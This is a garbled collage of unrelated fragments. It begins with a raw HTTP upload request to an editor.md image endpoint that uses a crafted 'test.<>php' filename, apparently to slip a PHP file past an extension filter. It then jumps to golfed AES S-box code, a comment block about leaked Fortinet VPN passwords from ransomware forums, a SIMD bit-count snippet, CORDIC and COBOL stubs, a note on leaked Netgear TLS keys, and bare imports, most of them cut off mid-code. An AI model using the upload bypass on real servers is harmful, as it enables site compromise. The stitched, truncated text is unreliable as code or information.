POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 239
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip
----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
| n=256;q, t, m, e, p, c, f=(range(n),16,lambda x | |
| ,y, r=0:m((h:=x <<1,h^283)[ | |
| h&n!= 0],y>> 1,(r,r ^x) | |
| [y&1])if y else r,lambda | |
| a,w= 1,p=n -2:e(m(a, a),(w,m | |
| (w,a))[p&1] ,p>> 1)if p | |
| else w, lambda b: list( | |
| map (print,["%.2x "*t%(*b[r:r+t],)for | |
| r in [*q][::t]])),lambda a,i: (a<<i|a>>8-i)&255 | |
| ,lambda a: (a^c(a,1)^c(a,2)^c(a,3)^c(a,4))^99); |
| ##### COURTESY | |
| # @CuratedIntel | |
| # https://curatedintel.org | |
| ##### BACKGROUND | |
| # Initally shared on RAMP ransomware forum | |
| # Last shared on Groove ransomware extortion website | |
| # Publicized by Bleeping Computer, which led to this post being issued to help blue teamers | |
| # https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/ |
Counting the trailing zero bit count (TZCNT) can be done by isolating the lowest bit, then depositing this into the appropriate locations for the count. The leading zero bit count (LZCNT) can be done by reversing bits, then computing the TZCNT.
__m128i _mm_tzcnt_epi8(__m128i a) {
// isolate lowest bit
a = _mm_andnot_si128(_mm_add_epi8(a, _mm_set1_epi8(0xff)), a);
// convert lowest bit to indexBlog 2020/9/1
<- previous | index | next ->
updated 2025/4/2
| import math | |
| # 8087 tangent algorithm, from Implementing Transcendental Functions, R. Nave | |
| atan_table = [math.atan(2 ** -i) for i in range(0, 17)] | |
| def cordic_tan(z): | |
| # Compute tan of angle z, using CORDIC | |
| q = [] | |
| # Break down z into sum of angles, where each angle is 0 or atan(2**-i) |
| IDENTIFICATION DIVISION. | |
| PROGRAM-ID. ADD. | |
| ENVIRONMENT DIVISION. | |
| DATA DIVISION. | |
| WORKING-STORAGE SECTION. | |
| 77 IDX PICTURE 9999. | |
| 77 SUMX PICTURE 999999. | |
| 77 X PICTURE X. | |
| PROCEDURE DIVISION. | |
| BEGIN. |
There are at least two valid, signed TLS certificates that are bundled with publicly available Netgear device firmware.
These certificates are trusted by browsers on all platforms, but will surely be added to revocation lists shortly.
The firmware images that contained these certificates along with their private keys were publicly available for download through Netgear's support website, without authentication; thus anyone in the world could have retrieved these keys.
| #!/usr/bin/env python | |
| from sys import argv, stdout | |
| from os import system, remove, path | |
| from urlparse import urlparse | |
| import re | |
| import dfu | |
| import ssl | |
| import math | |
| import json | |
| import getopt |